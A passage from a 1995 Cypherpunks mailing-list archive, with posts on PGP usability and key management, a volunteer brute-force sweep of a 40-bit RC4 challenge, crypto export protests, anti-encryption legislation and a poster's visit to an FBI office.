collects "exxon" wordlists? Virtually anything you process against any of the wordlists will change into something equally as interesting (or uninteresting) as the original. The presence in a system of wordlists tends to reduce the content of natural language files in that system to examples of sentence structure. As an example of just how malleable sentence structure templates can be, the defense in such a case might convert the prosecution's charging document into a glowing commendation of the defendant, suitably introduced through an expert witness. Bolivar (who hopes to retire when he finishes school) From wilcoxb at nagina.cs.colorado.edu Wed Jul 19 10:44:59 1995 From: wilcoxb at nagina.cs.colorado.edu (Bryce Wilcox) Date: Wed, 19 Jul 95 10:44:59 PDT Subject: "Hey Phil! Stop telling people *not* to use PGP!" (plus: "help me with my PGP problems!") Message-ID: <199507191744.LAA04117@nagina.cs.colorado.edu> -----BEGIN PGP SIGNED MESSAGE----- [I posted the following to alt.security.pgp and sci.crypt. -Bryce] (If you don't want to help with my problems, skip to "Zimmermann needs to change pgpdoc1.txt" at the end.) First, I am trying to communicate with a fellow who refuses to upgrade to PGP2.6 because if RSA (as opposed to RSAREF) was good enough for Phil then it's good enough for him! Assuming for the moment that convincing him to upgrade is not feasible, isn't there a hack by which I can interoperate with him? He's using 2.3a and I'm using 2.6ui, 2.6.2, 2.6.1 and 2.6. (More on that later...) I can hack the C code if that is what is necessary to interoperate. Second, I am using several public keys and several different versions of PGP because I work from various computers with various levels of security. That is: when I am in the University's computer lab I use one key <617C6DB9> and the University's 2.6.2 but when I am on my home computer I use another <148A11E5> and my linux PGP 2.6.1 (I'm going to upgrade it any day now...). I also have a couple of other keys with "Bryce Wilcox" in the User ID field for other uses. The problem/gripe is that whenever I try to manipulate public keys on my keyring, PGP grabs the first one with User ID "Bryce". How do I extract, edit, sign, etc. the *other* "Bryce" keys on my public keyring. I tried giving PGP the Key ID, which seemed like the most reasonable user interface to me, but that didn't work. Third, how do I set those "PGP-Note" strings that appear in some people's PGP Signature Blocks? And lastly, a gripe. Zimmermann's "pgpdoc1.txt" needs to be changed. Let me explain: I am in the (long, drawn-out) process of trying to convince my friends and family members to use PGP. The first hurdle is that it is a pain in the butt to use, and they are not going to use it if it means they have to learn a handful of Unix commands and spend 30 seconds screwing with it every time they want to send mail. But that isn't the subject of this gripe. The second hurdle manifests when I send them a copy of "pgpdoc1.txt". They start browsing through it and come upon "NEVER EVER use PGP on a remote, multi-user system. It wouldn't have maximum security in that situation." They say "Oh, well I guess I can't use it then because damned if I'm going to upload and download all of my mail at 1200 baud just so Bryce will quit bugging me about this PGP thing." So I say "No no no, using it on a remote system is still better than nothing. Just be aware that it is easier to crack your secret key when you use it there than if you kept it on your home computer." So they go back to reading "pgpdoc1.txt" and it says "NEVER EVER use a public key which was sent to you through the Net. It could be tampered with." So they say, "What, I have to make a long-distance phone call to Cousin Joe in Israel before I can send him a 'Happy Birthday' message using PGP? Why bother?" And I say "No no no, using a key which you got through the Net is better than using no key at all, just be aware that if someone *really* wanted to spy on you that they could have tampered with it. When you see Cousin Joe next Christmas you can compare keys with him and make sure you have the right one." In short, pgpdoc1.txt needs to quit saying "NEVER EVER use PGP in other than MAXIMAL SECURITY situations" and start saying "If you want MAXIMAL security, do it this way, and if you are satisfied with lesser security, here are other options." I am fond of saying that we PGP enthusiasts have two choices ahead of us within a couple of years: either 5,000 enthusiasts using PGP with MAXIMAL SECURITY at all times, or 5,000 enthusiasts with MAXIMAL SECURITY and 10,000,000 computer-illiterate e-mail users using PGP with push-button interfaces and multi-user remote systems. The important thing, of course, is the easy-to-use, e-mail-integrated software (version 3.0, I hope?), but it would also help if Zimmermann's PGP Doc didn't tell those computer-illiterates to either "become enthusiasts or don't use it." Bryce signatures follow /=============------------ URL of the Day: DigiCash bv Bryce Wilcox, Programmer The currency of the future! Give me a bryce.wilcox at colorado.edu cyberbuck because I gave you this URL: ------------=============/ http://www.digicash.com/ -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBMA1EKPWZSllhfG25AQHzPAP+MB/JLhN+Un9yVXRv5fejb297YONynlPF EXxN6L7OwcD4q9XE23XdlutlQbAoK2tKbBLjTYat7s/t53W+jpCyKOChN7zn4V+I bdAu8TKE4IG9a7fzxK0jqcpHBWqU2SaRxpaPEKl7HXbtFJxdKqn1n/M7INPJxF2w /JsyZom8gmk= =Tzje -----END PGP SIGNATURE----- From hoz at univel.telescan.com Wed Jul 19 11:02:15 1995 From: hoz at univel.telescan.com (rick hoselton) Date: Wed, 19 Jul 95 11:02:15 PDT Subject: Government Mandated Keys Message-ID: <9507191802.AA21406@toad.com> I want to register the 1-bit key of "1". I expect to send about half my message bits encrypted, the rest will be clear-text. Rick F. Hoselton (who doesn't claim to present opinions for others) From adam at bwh.harvard.edu Wed Jul 19 11:10:52 1995 From: adam at bwh.harvard.edu (Adam Shostack) Date: Wed, 19 Jul 95 11:10:52 PDT Subject: "Hey Phil! Stop telling people *not* to use PGP!" (plus: "help me with my PGP problems!") In-Reply-To: <199507191744.LAA04117@nagina.cs.colorado.edu> Message-ID: <9507191810.AA22858@leonardo.bwh.harvard.edu> | The problem/gripe is that whenever I try to manipulate public keys on | my keyring, PGP grabs the first one with User ID "Bryce". How do I extract, | edit, sign, etc. the *other* "Bryce" keys on my public keyring. I tried | giving PGP the Key ID, which seemed like the most reasonable user interface | to me, but that didn't work. You often need to use 0xKEYID. I name my keys with expiration dates in them, so I can simply type 95 or 96 to id a key pretty uniquely. pub 1024/E794DA91 1994/06/09 Adam Shostack [Exp July 96] sig 876BD629 Adam Shostack [exp June 95] Also, the MyName option in config.txt is worth looking at. | Third, how do I set those "PGP-Note" strings that appear in some people's | PGP Signature Blocks? pgp -sa +comment="Boycott Clipper!" or comment in your config.txt With regards to docs, I tend to point people at Simson Garfinkel's pgp book. Most people find reading a book better than reading online docs, and Simson does a fairly good job of explaining everything. Adam -- "It is seldom that liberty I Support The Phil of any kind is lost all at Zimmermann legal defense fund once." -Hume http://www.netresponse.com/zldf ------------------ PGP.ZIP Part [001/713] ------------------- M4$L#!!0````(`">9ZQX3(*,_DG8!`-JF`P`'````4$=0+D581>S;=UQ3U__X M\9M!$E8,TT at PJ$10$1=*41%WW`KX$=Q[M5KK`&R%(HH+(T.M"S>NME8K=31N M:A$[K+5(K:O5BE405ZE:1"3?UTW`:K_]\/G\?O_^?CX>3^_-S;GGO,^\`^@W ------------------------------------------------------------- for next chunk to export --> http://dcs.ex.ac.uk/~aba/export/ From aba at dcs.exeter.ac.uk Wed Jul 19 11:32:29 1995 From: aba at dcs.exeter.ac.uk (aba at dcs.exeter.ac.uk) Date: Wed, 19 Jul 95 11:32:29 PDT Subject: ANNOUNCE: bruteRC4, 40 bits all swept Message-ID: <29518.9507191827@exe.dcs.exeter.ac.uk> Well we have demonstrated that 40 bit RC4 can be brute forced in around a weeks compute time. (We've also learned a list of thinks to fix for the next attempt as no key was forthcoming :-|, details on why not and what is being fixed to ensure this doesn't happen with a future RC4-40 or with the coming 40+88 SSL brute forceing are given below) The problems are logistic, human error, etc, from a compute time point of view it *really* was a full sweep of a 40 bit keyspace. And on average you would expect to sweep in half this time. The bulk of the work was done in under one weeks compute time, but problems with people forgetting to acknowledge what they swept, meant that 3 or 4 people swept the remaining key space over, which slowed down this announce. Here's the hall of fame, for bits/percentage swept per identifiable contributer (this is tallied by acknowledgement, if you swept but did not acknoweldge quickly enough or at all, that work won't show as the last keyspace was re-swept to hurry things up. The first acknowledgement to be recieved counts, the rest get ignored). bits/40 percent contributer ---------------------------------------------------------------------- 37.2 bits (14.063%) Jon Shekter 36.4 bits (8.081%) Alvin Brattli 36.1 bits (6.909%) anonymous 36.1 bits (6.836%) Dan Bailey 36.1 bits (6.812%) Piete Brooks 35.6 bits (4.688%) Loren Rittle 35.6 bits (4.663%) Adam Back 35.4 bits (4.102%) Eric Young 35.4 bits (4.004%) Fred 35.3 bits (3.809%) Martin Hamilton 35.2 bits (3.711%) Kevin Wang 35.0 bits (3.125%) Richard Martin 34.7 bits (2.490%) Dan Oelke 34.3 bits (1.978%) Branko Lankester 34.0 bits (1.611%) Simon McAuliffe 34.0 bits (1.562%) Mike Gebis 33.8 bits (1.392%) Pat Finerty 33.8 bits (1.367%) 33.5 bits (1.123%) Panu Rissanen 33.4 bits (1.001%) Paul Bell 33.3 bits (0.977%) Matt Thomlinson 33.3 bits (0.952%) Will Kinney 33.2 bits (0.903%) T J Hardin 33.2 bits (0.879%) Patrick May 32.8 bits (0.684%) Stephane Bortzmeyer 32.7 bits (0.635%) anonner 32.5 bits (0.537%) Matt Pauker 32.5 bits (0.537%) Ed Kern 32.5 bits (0.537%) Andrew Kuchling 32.5 bits (0.537%) 32.4 bits (0.513%) 32.3 bits (0.488%) Jon Baber 32.2 bits (0.439%) Bryce Boland 32.0 bits (0.391%) Thad Beier 32.0 bits (0.391%) Per Stoltze 32.0 bits (0.391%) Glenn Powers 32.0 bits (0.391%) 31.8 bits (0.342%) Mike Bailey 31.7 bits (0.317%) Robert Hayden 31.7 bits (0.317%) John Limpert 31.6 bits (0.293%) Opus 31.6 bits (0.293%) Mark Rogaski 31.6 bits (0.293%) 31.5 bits (0.269%) Michael Bacon 31.3 bits (0.244%) Jim Gillogly 31.3 bits (0.244%) David Zuhn 31.2 bits (0.220%) Russell Ross 31.2 bits (0.220%) Don Kitchen 31.0 bits (0.195%) Scott Renfro 31.0 bits (0.195%) Planar 30.8 bits (0.171%) Matt 30.8 bits (0.171%) Joe Thomas 30.8 bits (0.171%) Adrian Thomson 30.6 bits (0.146%) Michael Axelrod 30.6 bits (0.146%) Mark Eichin 30.6 bits (0.146%) Jason Burrell 30.3 bits (0.122%) Will Ware 30.3 bits (0.122%) Kevin Maher 30.3 bits (0.122%) Josh Sled 30.3 bits (0.122%) Checkered Daemon 30.3 bits (0.122%) Andrew Roos 30.0 bits (0.098%) Jason Weisberger 30.0 bits (0.098%) 30.0 bits (0.098%) 29.6 bits (0.073%) Mark Grant 29.6 bits (0.073%) Lou Poppler 29.6 bits (0.073%) Edwin de Graaf 29.6 bits (0.073%) David Conrad 29.6 bits (0.073%) Dan Tauber 29.6 bits (0.073%) Alexandra Griffin 29.6 bits (0.073%) 29.6 bits (0.073%) 29.0 bits (0.049%) Stuart 29.0 bits (0.049%) Pekka Riiali 29.0 bits (0.049%) Jeffrey Ollie 29.0 bits (0.049%) James Hightower 29.0 bits (0.049%) Hadmut Danisch 29.0 bits (0.049%) Bob Snyder 29.0 bits (0.049%) 28.0 bits (0.024%) Sang Hahn 28.0 bits (0.024%) Roy Silvernail 28.0 bits (0.024%) Ollivier Robert 28.0 bits (0.024%) Lucky Green 28.0 bits (0.024%) L Futplex McCarthy 28.0 bits (0.024%) Jeff Licquia 28.0 bits (0.024%) J Francois 28.0 bits (0.024%) Brian LaMacchia 28.0 bits (0.024%) Andy Brown 28.0 bits (0.024%) Adam Morrison 28.0 bits (0.024%) ---------------------------------------------------------------------- 40.0 bits (100.000%) 89 cpunks + x * anonners in 1 weeks compute Report is on the brute-rc4.html page also: http://dcs.ex.ac.uk/~aba/brute-rc4.html Problems. --------- But, briefly these are the things which may be responsible for the failure to find a key: a) We weren't sure if we had a known plaintext / ciphertext pair This due to lack of Microsoft Access specs, this was known from the begining, but we thought we'd try it and see. b) Eeek! There was a bug in bruterc4.c for some time which affected Alphas, and possibly other BSD machines. This meant keyspace wasn't being searched when the -v option was used. c) Some people reported that their browser / uuencode software combination meant that cutting and pasting of the uuencode plain text and cipher text files was silently failing due to extra spaces inserted by a flawed pasting operation. d) Human error - it is possible that some keys were unswept - by accident. e) Malicious humans - we don't know, but think this was not a problem. Solutions. ---------- Proposed solutions for future brute forcing efforts (such as the upcoming SSL effort), for respective points above: a) Need better spec of MA, or more experimentation / reverse engineering. For SSL this is not a problem as the SSL specs are openly available and very detailed. b) Write bug free software :-) Test more rigourously on multiple unixs and architectures with a brief test run. c) Use hex numbers in a config file. Ie don't use uuencode on web page. d) We're going to have the programs (bruteRC4.c and bruteSSL.c) produce a checksum on completion. Acknowledgements of swept keyspace must be with checksum. Crude check to reduce chances of mistyped big hex nums. Represent the key space as a 4 digit hex number like this: 1a23, in terms of 24 bit keyspaces, and represent keyspace to sweep in terms of numbers of those, lots of people had difficulty reasoning in log base2 for bits. e) Do nothing yet. If we get lots of compute and it proves to be a problem perhaps implement some redundancy into the system. Coming soon brute force attempt on Hal Finney's brute of 40+88bit SSL. Watch this space, several cypherpunks are hard at work optimising their bruteSSL.c code, and also writing farming software via a system of servers connected via sockets. The WWW page doler will still be available for those with out direct IP. Hal Finney's SSL challenge is here: http://www.portal.com/~hfinney/sslchal.html More on SSL later, but we hoped to give the SSL one a wider announce in sci.crypt, and see how *fast* we can brute 40 bit keyspace. Hope to see your compute in the brute SSL effort when it is announced, Adam -- HAVE *YOU* EXPORTED A CRYPTO SYSTEM TODAY? --> http://dcs.ex.ac.uk/~aba/rsa/ --rsa--------------------------------8<------------------------------------- #!/usr/local/bin/perl -s-- -export-a-crypto-system-sig -RSA-in-3-lines-PERL ($k,$n)=@ARGV;$m=unpack(H.$w,$m."\0"x$w),$_=`echo "16do$w 2+4Oi0$d*-^1[d2% Sa2/d0 At 11:02 AM 7/19/95 PDT, rick hoselton wrote: >I want to register the 1-bit key of "1". I expect to >send about half my message bits encrypted, the rest will be clear-text. Oh, go ahead, register 0 also. You'll probably want to switch keys occasionally during sessions. # Thanks; Bill # Bill Stewart, Freelance Information Architect, stewarts at ix.netcom.com From Doug.Hughes at Eng.Auburn.EDU Wed Jul 19 11:40:59 1995 From: Doug.Hughes at Eng.Auburn.EDU (Doug Hughes) Date: Wed, 19 Jul 95 11:40:59 PDT Subject: cypherpunk "Zen" victories Message-ID: <199507191840.NAA18738@netman.eng.auburn.edu> Vladimir Z. Nuri scribbled: > >I was recently marvelling at how much the "cypherpunk agenda" >is being advanced even in light of what would seem to be setbacks. >Particularly in the area of anonymous remailers. We now have a very >major article on remailers and Julf's setup in the NYT that portrays >them in an unbiased, unhysteria-stricken mode. Also in the article, >it quotes the police as regretting their falling victim to >Scientology manipulation and investigating the remailer "without >cause". A major officer is quoted as saying, roughly, "we are >going to need a crime before we investigate in the future". > Could you provide a page, date, and title for this article? I would like to read it but don't get a daily subscription. Muchas gracias Doug Hughes Engineering Network Services doug at eng.auburn.edu Auburn University From hayden at krypton.mankato.msus.edu Wed Jul 19 12:00:14 1995 From: hayden at krypton.mankato.msus.edu (Robert A. Hayden) Date: Wed, 19 Jul 95 12:00:14 PDT Subject: "Hey Phil! Stop telling people *not* to use PGP!" (plus: "help me with my PGP problems!") (fwd) Message-ID: -----BEGIN PGP SIGNED MESSAGE----- On Wed, 19 Jul 1995, Bryce Wilcox wrote: [lots of really really good stuff deleted, because I really don't have anything good to add to it] > I am fond of saying that we PGP enthusiasts have two choices ahead of us > within a couple of years: either 5,000 enthusiasts using PGP with > MAXIMAL SECURITY at all times, or 5,000 enthusiasts with MAXIMAL > SECURITY and 10,000,000 computer-illiterate e-mail users using PGP with > push-button interfaces and multi-user remote systems. I said it last week, and I'll say it again. From a sociological standpoint, it's those 10,000,000 computer-illiterate e-mail users that we need to focus all of our efforts towards. Those 5,000 literate people we really don't have to care about. I will say, and this makes for interesting commentary, over the last week or so, I've released those simple scripts for Pine (and today for Tin) that integrate digital signing fairly seamlessly with those programs. I've received about 200 requests since Monday from people asking where to find PGP, asking about similiar scripts for Windoze or Dos or Mac, or thanking me for providing an easier way to do digital signatures. And that was a simple sh script! Imagine if some people with REAL writing ability worked on some programs... Pushing for wide use of digital signatures is one way to get PGP to be a "household" name for people writing on the net. I now sign everything I post and mail. It gets people's attention and interest. Interest leads to use. > The important thing, of course, is the easy-to-use, e-mail-integrated > software (version 3.0, I hope?), but it would also help if Zimmermann's > PGP Doc didn't tell those computer-illiterates to either "become enthusiasts > or don't use it." I think the politics of PGP is stagnated at about two years ago or so. The demographics are no longer accepting to long technical rants. Today's generation of net.user doesn't need 100% security 100% of the time, what they need is "good" security when they want it, but in a way that they don't have to think much about. Sorry if I'm ranting again abotu everything I said last week. I'm in the process of doing research on social evolution using the net as an example of accelerated cultural change. I'm kinda in a specific mindset right now :-). -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: PGP Signed with PineSign 2.1 iQCVAwUBMA1WVjokqlyVGmCFAQEtJgP+JPbrM4KSQGiIznlnghYs1FEizGGhHLJZ +cSz36jatErJ/kFOEsNSwLz0crjdyHtv2v3ojsExTQVgQxzS/U60zwNR+gPxwdr7 bpIoEaZwGtANmsrkUtTqIwEncs7WPAF08ZbbaZpeB58qcvnpAergshrJya7gtOSM Wp8BqFcU+84= =TOLZ -----END PGP SIGNATURE----- ____ Robert A. Hayden <=> Cthulhu Matata \ /__ -=-=-=-=- <=> -=-=-=-=- \/ / Finger for Geek Code Info <=> hayden at krypton.mankato.msus.edu \/ Finger for PGP Public Key <=> http://att2.cs.mankato.msus.edu/~hayden From netchaos at ix.netcom.com Wed Jul 19 12:56:23 1995 From: netchaos at ix.netcom.com (Daniel Gannon ) Date: Wed, 19 Jul 95 12:56:23 PDT Subject: Adding Message-ID: <199507191954.MAA04876@ix5.ix.netcom.com> I would like to be added to your list. From hayden at krypton.mankato.msus.edu Wed Jul 19 13:01:44 1995 From: hayden at krypton.mankato.msus.edu (Robert A. Hayden) Date: Wed, 19 Jul 95 13:01:44 PDT Subject: TINSIGN: Simple script for PGP signing messages in Tin 1.22 In-Reply-To: Message-ID: -----BEGIN PGP SIGNED MESSAGE----- [my duplicate posting deleted] ARGH! Sorry folx. I forgot about that buggy feed. -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: PGP Signed with PineSign 2.1 iQCVAwUBMA1ktjokqlyVGmCFAQFhaQQAtUG6p4Jr0DBEI02lKNRDfhkw4gt7C8oA jn43BK/VPF4r8sSSoxOvJFL8a5HHoP/RhXGWu5sQ4W6NOzFEm8KkjlChV7LbmUzP T+6q/8cZlOq4oa2Ja4WzGosbQ0SfKaHb6nGEkfKGWXMeijsVugYqlmw8y+ge2oXc 5Rv7z69dwpc= =CXY5 -----END PGP SIGNATURE----- ____ Robert A. Hayden <=> Cthulhu Matata \ /__ -=-=-=-=- <=> -=-=-=-=- \/ / Finger for Geek Code Info <=> hayden at krypton.mankato.msus.edu \/ Finger for PGP Public Key <=> http://att2.cs.mankato.msus.edu/~hayden From andrew_loewenstern at il.us.swissbank.com Wed Jul 19 13:08:21 1995 From: andrew_loewenstern at il.us.swissbank.com (Andrew Loewenstern) Date: Wed, 19 Jul 95 13:08:21 PDT Subject: "Hey Phil! Stop telling people *not* to use PGP!" (plus: "help mewith my PGP problems!") (fwd) Message-ID: <9507192005.AA00307@ch1d157nwk> Robert A. Hayden writes: > I said it last week, and I'll say it again. From a sociological > standpoint, it's those 10,000,000 computer-illiterate e-mail users > that we need to focus all of our efforts towards. Those 5,000 > literate people we really don't have to care about. [...snip...] > Imagine if some people with REAL writing ability worked on some > programs... [...snip...] > I think the politics of PGP is stagnated at about two years ago or > so. The demographics are no longer accepting to long technical > rants. Today's generation of net.user doesn't need 100% security > 100% of the time, what they need is "good" security when they want > it, but in a way that they don't have to think much about. This has been hashed over on the list many, many times in the past. I suspect there are competent programmers out there who want to write easy-to-use interfaces for PGP (I know at least one), but there are problems. To write a good GUI interface (with proper key-management features) on Windows or Mac, for instance, you need to have access to PGP's internal crypto routines as well as the routines for reading and writing PGP messages and key certificates. The problem is that the PGP 2 code does not have the internal 'core' routines separated from it's command-line interface. The answers are to either shell out to PGP (which, AFAIK, is what every interface except MacPGP does), hack the PGP 2 code, or use PGPTools. Shelling out to PGP isn't going to cut it for a slick GUI package, especially if you want to have a decent key-management interface. You could do it, but it will be slow and kludgy and you will have to change it all when PGP 3 comes out. Hacking PGP would be a major effort. Additionally, there is risk of introducing a subtle flaw in the crypto routines. However, the main killer is that PGP 3 is going to have a brand new key-ring format along with many other enhancements, fixes, and other changes to the crypto code. All of the work will have to be done again to bring the interface up to date when PGP 3 is released, which could be within 6 months (who knows?). PGPTools is buggy and not supported. Any effort to bring PGPTools up to a stable level would likely be thrown away when PGP 3 is released. The real solution is that PGP 3 will have all of it's core routines in a separate library with a stable API specifically for the purpose of writing slick interfaces. So basically all of the would-be PGP interface developers are waiting for beta releases of the library. Unfortunately, this has been the situation for almost two years now. By now the PGP 2 code could have been completely turned into a library with a clean API and no command-line interface remnants, but developers have been discouraged by the promise of PGP 3 coming out 'RSN'... andrew ...still waiting for pgp 3 news... From zinc at zifi.genetics.utah.edu Wed Jul 19 13:11:44 1995 From: zinc at zifi.genetics.utah.edu (zinc) Date: Wed, 19 Jul 95 13:11:44 PDT Subject: cfs on linux - rpcgen broken in slackware distribution! Message-ID: cpunks, yesterday i requested some help compiling cfs on my linux system. well, after some serious help i got it to work. the problem was that my copy of rpcgen was broken. this was the copy installed with the slackware distribution. damn, this is some sort of never ending contest between my sanity and the slackware distribution! -pat patrick finerty = zinc at zifi.genetics.utah.edu = pfinerty at nyx.cs.du.edu U of Utah biochem grad student in the Bass lab - zinc fingers + dsRNA! ** FINGER ME for my pgp public key ** crypto for the masses! zifi runs LINUX 1.2.11 -=-=-=WEB=-=-=-> http://zifi.genetics.utah.edu From pgf at tyrell.net Wed Jul 19 13:31:41 1995 From: pgf at tyrell.net (Phil Fraering) Date: Wed, 19 Jul 95 13:31:41 PDT Subject: bi-directional dining cryptographers In-Reply-To: <199507180649.XAA25432@ix3.ix.netcom.com> Message-ID: <199507192027.AA25383@tyrell.net> I know that it would be difficult. In _that_ part I was just playing around. It's at least as valid as mechanically-written letters as a list topic. (Well, I thought it was a funny if dreadful idea). Phil From jfmesq at ibm.net Wed Jul 19 13:52:28 1995 From: jfmesq at ibm.net (James F. Marshall) Date: Wed, 19 Jul 95 13:52:28 PDT Subject: "Hey Phil! Stop telling people *not* to use PGP!" (plu Message-ID: <199507192052.UAA52104@smtp-gw01.ny.us.ibm.net> >I've received about 200 requests since Monday from people asking where to >find PGP, asking about similiar scripts for Windoze or Dos or Mac.... If anyone asks about OS/2, a good script is available at ftp.gibbon.com. FWIW. --JFM From paul.elliott at hrnowl.lonestar.org Wed Jul 19 14:20:36 1995 From: paul.elliott at hrnowl.lonestar.org (Paul Elliott) Date: Wed, 19 Jul 95 14:20:36 PDT Subject: Why no action alert, coalition opposing S. 974? Message-ID: <300d66d0.flight@flight.hrnowl.lonestar.org> -----BEGIN PGP SIGNED MESSAGE----- I have read the EFF analysis of Senate bill 974, which is designed to inhibit encryption on Networks. I think that it is a thoughtful document but I am concerned that there has been no action alert produced to tell people the most effective way to oppose this horrible Bill. People who are concerned about the bill need to know what Senators could most profitably be contacted. Also why has no coalition been formed to oppose this bill? I am aware that many people are busy opposing S314, but S974 is equally terrible as it attempts to suppress free expression. I could try to produce an action alert myself, but I would probably make errors as I am not up on the legal subtleties and the intricacies of Congress. Could some of the savvy people please write an action alert? Otherwise I will be forced to take a stab at it. - -- Paul Elliott Telephone: 1-713-781-4543 Paul.Elliott at hrnowl.lonestar.org Address: 3987 South Gessner #224 Houston Texas 77063 -----BEGIN PGP SIGNATURE----- Version: 2.6 iQCVAgUBMA10YfBUQYbUhJh5AQFMBAQAgUJAj1nNdG54IxIFAboCw+Q/E8WWOvEO 9Aazj9hjHK7VeHi+vpTY7eJRbQq7LyQq/ex41PE+QXu+mjWe3c1si8HmhherA22i CUGv3UI8L/Z43zLtN2TI9reJsizeYnmHlO3uUffP3vnhwBJm1G7EAlXvKFqikC90 q1DUqqgq7k4= =4yQ7 -----END PGP SIGNATURE----- From gate at id.WING.NET Wed Jul 19 14:51:12 1995 From: gate at id.WING.NET (The Gate) Date: Wed, 19 Jul 95 14:51:12 PDT Subject: Investigate Your Federal Building :) Message-ID: Had problems with the original transmission... 21:22 EST July 17th, 1995 New Haven, CT Day One, Investigation Begins. Of course, I've been researching THE FACTS all my life, but never before have I gone to the FBI to ask for information. Also of course, they gave me none, or practically none, just this: (202) 324-3000. Can anyone guess? FBIHQ it says on the yellow post-it note. That's all she could give me. I have been incredibly scared these last couple of days, wondering exactly what I was doing, but I feel better this evening. Just going down to the Federal Building and poking around asking questions has not gotten me killed, and I don't think it will. Check. In a recent post to this list I said I was going to go to the Federal Building here in New Haven to begin a local investigation of Federal Events. So I put on my coat and tie, washed up a little (long-hair and beard couldn't be controlled, will not cut) and started walking, stopping off at Kinko's Copies to make a free local phone call to one of my partners and grab some note paper for the session. Then on across the green towards the courthouse, town hall and on Orange Street, the Robert N. Giaimo (sp) Federal Building. Of course, I'd been there before, to the post office, and it was always a rather non-descript affair. But now I was looking for something, and though I didn't find what I was looking for, I did find out a lot. Alot of it was disturbing, alot of it was funny, and alot of it was encouraging, especially the print of the original Declaration and Constitution/Bill of Rights, as well as the posted Code of Ethics for Government Service, Public Law 96-303, passed unanimously in Congress on June 27, 1980, signed by the President (Carter?) on July 3, 1980: Article One of Ten: "Put loyalty to the highest moral principles and to country above loyalty to persons, party or Government department." No problem, I thought, I'll keep that in mind. Article 9: "Expose corruption wherever discovered." Whoa, that's a tough one, where are you going to find corruption in the United States of America? Article 11:"Uphold the Constitution, laws and regulations of the United States and all governments therein and never be a party to their evasion." Well, the Constitution I can uphold, as it upholds me, but I don't know about all the other laws and regulations...I'm not sure everything signed since 1776 passes my muster. You? But though I had been to the Federal Building several times previously, I wasn't ready for what I encountered this time, as it had never before been present: heavy security presence. No secret service types, just rent-a-cops with a metal detector and baggage x-ray device. But they were bustling, somewhat loud, and definitely a presence. A humorous note: Usually the electro-magnetic energy that I generate because of meditation and honest emotional presence is enough to kick the metal detectors, but I thought if I took my belt off, I could get through. No such luck, and when I took my belt off, my pants, which were bought for my bigger brother, started to fall off. I don't wear underwear either, so I ended up walking through security holding my breeches up by hand. I thought, mmm the joy of security...of course, it was *my* costume (cover) that was falling apart, but I got back together without real embarassment. That's when I started to look around the building lobby. First I checked the directory. Yup, there it was, FBI, fifth floor, right underneath the penthouse cafe. BATF on the second floor, IRS third. Department of Protective Service (SS) first floor, though I saw no evidence of their lair or personnel. Bill Clinton and Al Gore on the wall, of course...Recycling bins for paper, cans, bottles and something else, perhaps newpapers. Nice touch I thought, it would be nice to see more of those. I wandered over to the bulletin board: Arson informants offered rewards $100,000 to $250,000 rewards offered to informers leading to convictors of international terrorists - mostly airplane and boat hijackers. The Code of Ethics for Government Service as mentioned above. Help for choking victims... (At this time, I was rushed by the closing of the computer center. The facts are flear though...) Anyway, on to greater heights... Elevator, fifth floor, get in, man there, looks like FBI, look at numbers in elevator, 5 already lit. A real live FBI agent and I in the elevator together, wow. Day already made, still only ten o'clock or so. Get off 5th floor. Man goes one way, I go another, meet another real live FBI guy, "Where's the receptionist?" "Through that door" came the warm reply from a brown-suited man with a pock-marked face. Hmm, definitely FBI. Into FBI visitor center, one small room, bulletproof glass, Time magazines, American Flag with gold tassels in corner, photos of Agents, woman behind the counter: "Uh, I'm something of a freelance reporter for Citizen's Television and Internet newsgroups, and I'd like to know if you can confirm whether or not someone worked for the FBI..." Polite no from FBI woman. "Is there a public information office?" No, then checks mind, goes to back to talk with all male contingent, at least seven agents in back room, including the one I saw on the elevator, all are rustled into alert by the inquiry from CTV producer and Searchnet Reporter. I can just hear them saying, by gosh they were right, the Internet really is spawning investigators... Then all I get back is the phone number, but it was a lot of fun. Down to the BATF? nah, enough for the day. Thoughts on the way to the library... Next time, maybe I'll deliver a message. Gotta run, Lee. ____________________________|||||||||||||||||||||______________________________ R. Leland Lehrman at The Gate, New Haven, CT. http://id.wing.net/~gate/gate.html God, Art, Technology and Ecology Research and Development >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>Do you love the Mother?>>>>>>>>>>>>>>>>>>>>>>>> From sunder at escape.com Wed Jul 19 14:51:48 1995 From: sunder at escape.com (Ray Arachelian) Date: Wed, 19 Jul 95 14:51:48 PDT Subject: Anti-Electronic Racketeering Act of 1995 (fwd) In-Reply-To: <199507140629.XAA21600@ix3.ix.netcom.com> Message-ID: On Thu, 13 Jul 1995, Bill Stewart wrote: > >Eh, what do "virus hackers" have to do with encryption, why is it these > >morons justify the destruction of encryption by mentioning hackers and > >viruses? > > You're parsing the title wrong. It's an act to support racketeering > through opposition to electronic communications. What viruses have to > do with encryption is that encryption makes it easier to prevent viruses, > and Senator Grassley wants to stop that. And the term "strong" was used in its > correct engineering meaning, as in "It's a vessel of fertilizer which is > very strong and promotes growth". Erm, not quite. Stealth viruses supposedly use "encryption" to hide themselves, but then, I shouldn't mention this, might give El Federale a bit more fuel to burn us with. (But even these beasts can be caught easily if you know how... i.e. create a large executable that does nothing but quit to the operating system. Run it every day and compare it every day. The day it changes is the day a virus infected it.) Still, you could write beneficial viruses, or virus like programs that are beneficial in nature in some way. KOH for instance? However, none of the above has any iota of anything to do with linking the four horsemen of LEA's to crypto in any real-life-already-proven situation in any significant numbers. Banning crypto for EVERYONE in order to catch maybe, what, two zit-bearing kids hoarding beaver shots downloaded from alt.bin.erotica.pix a year is a tremendous loss of everyone's privacy. > Hey, Julf, we've got your number! And we're making sure nobody's got any > encryption to prevent fraud with. Hell, at this point, my guess is that the mafia(s) doesn't use crypto, or that if it does, it can be caught via other means. A strong, well developed crypto system in use by the mafia would more than likely never happen... not until mobsters get into computers. Ditto for terrorists. If they did use crypto, I suspect they wouldn't get caught. (For the paranoid, assuming they used crypto, and they didn't get caught, then the FBI or other TLA is doing the same as the gov't in Farenheight 451... pick someone else, and jail them. Otherwise, how do you explain all the jailbird mobsters?) To LEA's out there: Get a life, get off the net and go bust some murderers. Stop attacking easy targets. Do your jobs. Confront the real criminals. What's the matter? Is it easier to go after crypto geeks than it is to arrest drug dealers who shoot back? =================================================================93======= + ^ + | Ray Arachelian | Amerika: The land of the Freeh. | \-_ _-/ | \|/ |sunder at escape.com| Where day by day, yet another | \ -- / | <--+-->| | Constitutional right vanishes. |6 _\- 